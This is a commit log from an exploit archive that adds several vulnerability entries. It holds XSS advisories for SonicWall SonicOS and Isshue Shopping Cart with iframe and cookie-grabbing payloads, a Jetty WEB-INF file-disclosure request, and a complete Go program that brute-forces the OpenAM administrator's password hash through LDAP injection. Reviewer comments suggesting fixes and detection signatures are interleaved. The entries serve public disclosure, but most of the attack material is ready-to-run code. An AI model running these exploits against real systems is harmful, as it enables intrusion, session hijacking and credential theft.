DB: 2021-11-04

17 changes to exploits/shellcodes

RDP Manager 4.9.9.3 - Denial-of-Service (PoC)
PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS)
Fuel CMS 1.4.1 - Remote Code Execution (3)
Eclipse Jetty 11.0.5 - Sensitive File Disclosure
WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS)
OpenAM 13.0 - LDAP Injection
Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS)
Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection
Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS)
PHP Melody 3.0 - 'vid' SQL Injection
Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection
PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS)
Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS)
Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
Offensive Security 2021-11-04 05:02:12 +00:00
parent 7e3fa43161
commit 6829e7f3b7
18 changed files with 3520 additions and 0 deletions


@ -0,0 +1,245 @@
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
# Date: 2021-10-18
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
# Version: 6.5.4
Document Title:
===============
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2272
Release Date:
=============
2021-10-18
Vulnerability Laboratory ID (VL-ID):
====================================
2272
Common Vulnerability Scoring System:
====================================
5
Vulnerability Class:
====================
Cross Site Scripting - Non Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
machines (VMs), application workloads and data must be among the top priorities.
(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.
Affected Product(s):
====================
Model: SonicWall SonicOS
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
OS: SonicOS Enhanced
Vulnerability Disclosure Timeline:
==================================
2021-07-24: Researcher Notification & Coordination (Security Researcher)
2021-07-25: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content.
The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module.
Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible
to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
inject is get and the attack vector is located on the client-side without being persistent.
Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing
(non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation.
Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.
Module(s):
[+] Decryption Service
Vulnerable Function(s):
[+] Edit (Bearbeiten)
Vulnerable Parameter(s):
[+] Common Name
Affected Module(s):
[+] Show Connection Failures
Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application
2. Open the Decryption Service > Common Name > Show Connection Failures
3. Click on Edit and inject a js test payload into the restricted client content
4. Pushing anywhere else outsite field will temporarily save the payload
5. The script code immediately executes in the web browsers context
5. Successful reproduce of the script code inject web vulnerability!
Vulnerable Source: Connection Failure List (getConnFailureList.json)
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>
--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
https://nsv800.localhost:9281/evil.source
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: text/html;charset=UTF-8
-
https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
Host: nsv800.localhost:9281
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer: https://nsv800.localhost:9281/logo.html
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
-
GET: HTTP/1.0 200 OK
Server: SonicWALL
Content-type: application/json
Accept-Ranges: bytes
Reference(s):
nsv800.localhost:9281/main.html
nsv800.localhost:9281/getJsonData.json
nsv800.localhost:9281/sslSpyConfigure.html
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure.
The input and output parameters needs to be sanitized to prevent script code injects.
Security Risk:
==============
The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)
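Review bot: The Solution - Fix & Patch section names getJsonData.json and sslSpyConfigure as the places to encode, but the Vulnerable Source block attributes the unencoded Common Name to the connection failure list (getConnFailureList.json), where the value lands both inside the data-override-name attribute and as a table-cell text node; name the serializer that emits that list as the fix location and state that the value needs HTML attribute encoding in the first context and text-node encoding in the second. Smaller documentation points in the same hunk: the PoC steps are numbered 1-5 with "5." used twice, "outsite" and "sessionc" are typos, and the second session-log URL reads "nnsv800.localhost" while every other reference uses "nsv800.localhost".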


@ -0,0 +1,41 @@
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
# Date: 2021-11-03
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.eclipse.org/jetty/
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
# Tested on: Kali Linux
# CVE : CVE-2021-34429
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429
POC - Access WEB-INF/web.xml
## Request
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:9006
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
## Response
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>
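Review bot: The header gives the affected ranges (9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6) but never states the remediation those ranges imply; add a line such as "Fixed in: 9.4.43 / 10.0.6 / 11.0.6" so a reader can act on it. The request line `GET /%u002e/WEB-INF/web.xml` is the whole point of the PoC, yet nothing explains what `%u002e` is (a non-standard percent-escape of ".") or why the server still serves a WEB-INF resource through it; one sentence there, plus a detection hint (search access logs for `%u00` sequences in paths that resolve to /WEB-INF/ or /META-INF/), would make the entry useful to defenders. Also, the title says "Eclipse Jetty 11.0.5" while the body applies to three release branches; the title should carry the ranges or say "multiple versions".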

exploits/java/webapps/50480.go Executable file

@ -0,0 +1,253 @@
# Exploit Title: OpenAM 13.0 - LDAP Injection
# Date: 03/11/2021
# Exploit Author: Charlton Trezevant, GuidePoint Security
# Vendor Homepage: https://www.forgerock.com/
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
# Version: OpenAM v13.0.0
# Tested on: go1.17.2 darwin/amd64
# CVE: CVE-2021-29156
#
# This vulnerability allows an attacker to extract a variety of information
# (such as a users password hash) from vulnerable OpenAM servers via LDAP
# injection, using a character-by-character brute force attack.
#
# https://github.com/guidepointsecurity/CVE-2021-29156
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
# https://portswigger.net/research/hidden-oauth-attack-vectors
package main
// All of these dependencies are included in the standard library.
import (
"container/ring"
"fmt"
"math/rand"
"net/http"
"net/url"
"sync"
"time"
)
func main() {
// Base URL of the target OpenAM instance
baseURL := "http://localhost/openam/"
// Local proxy (such as Burp)
proxy := "http://localhost:8080/"
// Username whose hash should be dumped
user := "amAdmin"
// Configurable ratelimit
// This script can go very, very fast. But it's likely that would overload Burp and the target server.
// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
// ~1700 requests.
rateLimit := 6
// Beginning of the LDAP injection payload. %s denotes the position of the username.
payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)
// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
// will be inserted.
// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
// usernames/session IDs/etc depending on your use case.
// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
// The keyspace for brute-forcing individual characters is stored in a ringbuffer
// You may need to change how this is initialized depending on the types of data you're
// trying to retrieve. By default, this is configured for password hashes.
dict := makeRing()
// Working characters for each step are concatenated with this string. Further tests are conducted
// using this value as it's built.
// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
// to resume a previous brute-forcing session.
password := ""
proxyURL, _ := url.Parse(proxy)
// You can modify the HTTP client configuration below.
// For example, to disable the HTTP proxy or set a different
// request timeout value.
client := &http.Client{
Transport: &http.Transport{
Proxy: http.ProxyURL(proxyURL),
},
Timeout: 30 * time.Second,
}
// Channels used for internal signaling
cracked := make(chan string, 1)
foundChar := make(chan string, 1)
wg := &sync.WaitGroup{}
wg.Add(1)
// All hacking tools need a header. You may experience a 10-15x performance improvement
// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
// ASCII art typical of these kinds of tools.
printHeader()
loop:
for {
select {
case <-cracked:
// Full hash test succeeds, terminate everything
// N.B. this feature does not work, see my comments on checkCracked.
fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
wg.Done()
break loop
case char := <-foundChar:
// In the event that a test character succeeds, that thread will pass it along in the
// foundChar channel to signal success. It's then concatenated with the known-good
// password hash and the whole thing is tested in a query
// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
// in the manner I expect. But it might still work for other types of data.
password += char
fmt.Printf("Progress so far: '%s'\n", password)
// Forgive these very ugly closures
go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
// Add random jitter before submitting request
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
checkCracked(client, url, payload, &password, cracked)
})(client, &partURL, &testCharPayload, password, &cracked)
default:
for i := 0; i < rateLimit-1; i++ {
testChar := dict.Value.(string)
go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
time.Sleep(1 * time.Second)
getChar(client, url, payload, &password, &testChar, foundChar)
})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
dict = dict.Next()
}
time.Sleep(1 * time.Second)
}
}
wg.Wait()
}
// checkCracked tests a complete string in a query against the OpenAM server to
// determine whether the exact, full hash has been retrieved.
// This doesn't actually work, because the server doesn't respond as I'd expect
// A better implementation would probably watch until all positions in the ringbuffer
// are exhausted in testing and terminate (since there's no way to progress further)
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("checkCracked: %s", err.Error())
return
}
if res.StatusCode == 200 {
*cracked <- *password
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
}
// getChar tests a given character at the end position of the configured payload and dumped hash progress.
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
// Concatenate test character -> password -> payload -> attack URL
combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
fullPayload := fmt.Sprintf(*payload, combinedPass)
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
req, err := http.NewRequest("GET", fullURL, nil)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
res, err := client.Do(req)
if err != nil {
fmt.Printf("getChar: %s", err.Error())
return
}
if res.StatusCode == 200 {
*foundChar <- *testChar
return
}
if res.StatusCode == 404 {
return
}
fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
}
// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
// and password hash encodings.
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
// you, so be sure to update these strings if the keyspace for your use case is different.
func makeRing() *ring.Ring {
var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
var lcase string = `abcdefghijklmnopqrstuvwxyz`
var num string = `1234567890`
var punct string = `$+/.=`
var dictionary string = upcase + lcase + num + punct
buf := ring.New(len(dictionary))
for _, c := range dictionary {
buf.Value = fmt.Sprintf("%c", c)
buf = buf.Next()
}
return buf
}
// printHeader is cool.
func printHeader() {
fmt.Printf(`
_______ ,---. ,---. .-''-.
/ __ \ | / | | .'_ _ \
| ,_/ \__)| | | .'/ ( ' ) '
,-./ ) | | _ | |. (_ o _) |
\ '_ '') | _( )_ || (_,_)___|
> (_) ) __\ (_ o._) /' \ .---.
( . .-'_/ )\ (_,_) / \ '-' /
'-''-' / \ / \ /
'._____.' '---' ''-..-'
.'''''-. .-'''''''-. .'''''-. ,---. .'''''-. .-''''-. ,---. ,--------. .------. .---.
/ ,-. \ / ,'''''''. \ / ,-. \ /_ | / ,-. \ / _ _ \ /_ | | _____| / .-. \ \ /
(___/ | ||/ .-./ ) \| (___/ | | ,_ | (___/ | || ( ' ) | ,_ | | ) / / '--' | |
.' / || \ '_ .')|| .' / ,-./ )| _ _ _ _ .' / | (_{;}_) |,-./ )| | '----. | .----. \ /
_.-'_.-' ||(_ (_) _)|| _.-'_.-' \ '_ '') ( ' )--( ' ) _.-'_.-' | (_,_) |\ '_ '')|_.._ _ '. | _ _ '. v
_/_ .' || / . \ || _/_ .' > (_) )(_{;}_)(_{;}_)_/_ .' \ | > (_) ) ( ' ) \| ( ' ) \ _ _
( ' )(__..--.|| '-''"' || ( ' )(__..--.( . .-' (_,_)--(_,_)( ' )(__..--. '----' |( . .-' _(_{;}_) || (_{;}_) |(_I_)
(_{;}_) |\'._______.'/(_{;}_) | '-''-'| (_{;}_) | .--. / / '-''-'| | (_,_) / \ (_,_) /(_(=)_)
(_,_)-------' '._______.' (_,_)-------' '---' (_,_)-------' )_____.' '---' '...__..' '...__..' (_I_)
~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
`)
}
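Review bot: The header block at the top of this file uses `#` comments, which are not valid Go, so exploits/java/webapps/50480.go does not compile as committed; make that block `//` comments (or a package doc comment) placed before `package main`. On the defender side the file documents the exposure well enough to act on, and the advisory should say so: the injection travels in the `resource` parameter of `.well-known/webfinger` and closes the LDAP filter with `)` and `*` (see the testCharPayload and testCrackedPayload strings), so the server-side fix is to escape RFC 4515 filter metacharacters in that value before the search filter is built, and a `webfinger?resource=` request whose value contains `)(` or `*)` is a usable detection signature. A "Fixed in" line for OpenAM would complete the entry; the header currently only lists the vulnerable 13.0.0 release.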


@ -0,0 +1,231 @@
# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
# Date: 2021-10-22
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
# Version: 3.5
Document Title:
===============
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2284
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2284
Common Vulnerability Scoring System:
====================================
5.1
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
500€ - 1.000€
Product & Service Introduction:
===============================
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management
with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now.
Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
solutions. Isshue is the best choice for any type of e-commerce business, big or small.
(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.
Affected Product(s):
====================
bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
Medium User Interaction
Disclosure Type:
================
Responsible Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules.
The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input
and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on
the application-side.
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Edit Title
Vulnerable Input(s):
[+] Title
Vulnerable Parameter(s):
[+] title
Affected Module(s):
[+] stock
[+] customer
[+] invoice
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
Vulnerable Source:
<div class="row">
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
<div class="panel-heading ui-sortable-handle">
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
<span class="control-title">Edit title</span></a></li><li>
<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
<a data-func="reload" data-tooltip="Reload" data-toggle="tooltip" data-title="Reload" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-reload"></i><span class="control-title">Reload</span></a></li><li>
<a data-func="minimize" data-tooltip="Minimize" data-toggle="tooltip" data-title="Minimize" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-minus"></i><span class="control-title">Minimize</span></a></li><li><a data-func="expand"
data-tooltip="Fullscreen" data-toggle="tooltip" data-title="Fullscreen" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-fullscreen"></i><span class="control-title">Fullscreen</span></a></li><li>
<a data-func="close" data-tooltip="Close" data-toggle="tooltip" data-title="Close" data-placement="bottom" data-original-title="" title="">
<i class="panel-control-icon ti-close"></i><span class="control-title">Close</span></a></li></ul>
<div class="dropdown-toggle" data-toggle="dropdown"><span class="panel-control-icon glyphicon glyphicon-cog"></span></div></div></div>
<form action="https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice" class="form-vertical" id="validate" name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">
<div class="panel-body">
<div class="row">
<div class="col-sm-8" id="payment_from_1">
<div class="form-group row">
<label for="customer_name" class="col-sm-3 col-form-label">Customer Name <i class="text-danger">*</i></label>
<div class="col-sm-6">
<input type="text" size="100" value="a as" name="customer_name" class="customerSelection form-control ui-autocomplete-input" placeholder="Customer Name" id="customer_name" autocomplete="off">
<input id="SchoolHiddenId" value="HW77BA6CZEJXCV8" class="customer_hidden_value" type="hidden" name="customer_id">
</div>
--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==
-
GET: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
set-cookie: cookie=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; bm=29207327be4562a93104e7c7c2e62fe74d7d12de-
1629733189-1800-AStEmjkeD30sgtw0bgFOcvlrw7KiV79iVZGn+JuZ0bDjD7g99V69gfssqh4LvIWof7tjzmwNEeHHbVZcMib7hnkgJULvefbayRn8vBdfB73nFdoUChp8uXuiRxDu17LDBA==; GMT; Max-Age=7200; path=/
Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the shopping cart web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
LUDWIG-ERHARD STRAßE 4
34131 KASSEL - HESSEN
DEUTSCHLAND (DE)


@ -0,0 +1,260 @@
# Exploit Title: PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS)
# Google Dork: subtitle:Copyright © 2021 PHPJabbers.com
# Date: 2021-10-28
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.phpjabbers.com/faq.php
# Software Link: https://www.phpjabbers.com/simple-cms/
# Version: v5
# Tested on: Linux
Document Title:
===============
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2300
Release Date:
=============
2021-10-28
Vulnerability Laboratory ID (VL-ID):
====================================
2300
Common Vulnerability Scoring System:
====================================
5.4
Vulnerability Class:
====================
Cross Site Scripting - Persistent
